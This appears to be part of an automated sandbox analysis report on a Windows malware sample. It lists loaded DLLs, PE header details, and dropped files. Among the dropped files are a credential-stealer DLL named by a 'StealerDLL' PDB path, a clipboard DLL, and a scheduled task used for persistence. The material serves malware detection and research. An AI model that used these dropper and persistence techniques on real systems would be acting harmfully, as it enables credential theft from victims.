                        Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
                        Source: tOuVwTJrau.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: tOuVwTJrau.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: tOuVwTJrau.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: tOuVwTJrau.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: tOuVwTJrau.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: tOuVwTJrau.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: tOuVwTJrau.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: tOuVwTJrau.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 0000000B.00000002.2085742458.0000018FEDA2F000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: softy.pdb source: powershell.exe, 0000000B.00000002.2086071669.0000018FEDA37000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000B.00000002.2086071669.0000018FEDA37000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: CallSite.Target.pdbn: source: powershell.exe, 0000000B.00000002.2086521310.0000018FEDA77000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2084376768.0000018FED9C5000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32A56-E329-4D4D1%0# source: powershell.exe, 0000000B.00000002.2086521310.0000018FEDA5D000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.1.dr, cred64[1].dll.1.dr
                        Source: tOuVwTJrau.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: tOuVwTJrau.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: tOuVwTJrau.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: tOuVwTJrau.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: tOuVwTJrau.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: cred64[1].dll.1.drStatic PE information: section name: _RDATA
                        Source: cred64.dll.1.drStatic PE information: section name: _RDATA
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_002F750F pushad ; iretd 0_2_002F7510
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_002F3573 pushad ; ret 0_2_002F358D
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_0030A6B4 push ecx; ret 0_2_0030A6C7
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_002FD989 pushfd ; retf 0000h0_2_002FD98A
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_000F7504 pushad ; iretd 1_2_000F7510
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_000F3573 pushad ; ret 1_2_000F358D
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_0010A6B4 push ecx; ret 1_2_0010A6C7
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_000F840A pushad ; iretd 2_2_000F840B
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_000F750F pushad ; iretd 2_2_000F7510
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_000F3573 pushad ; ret 2_2_000F358D
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_0010A6B4 push ecx; ret 2_2_0010A6C7
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_000FD989 pushfd ; retf 0000h2_2_000FD98A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B619A10 push ds; ret 11_2_00007FFD9B619A11
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B6110DC push eax; retf 11_2_00007FFD9B61113B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B6EC2CB pushfd ; retn 0000h11_2_00007FFD9B6EC2E1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B6EC2E4 pushfd ; retn 0000h11_2_00007FFD9B6EC2E5
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeFile created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeJump to dropped file
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeFile created: C:\Windows\Tasks\Gxtuum.jobJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: 0_2_003097DD GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003097DD
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
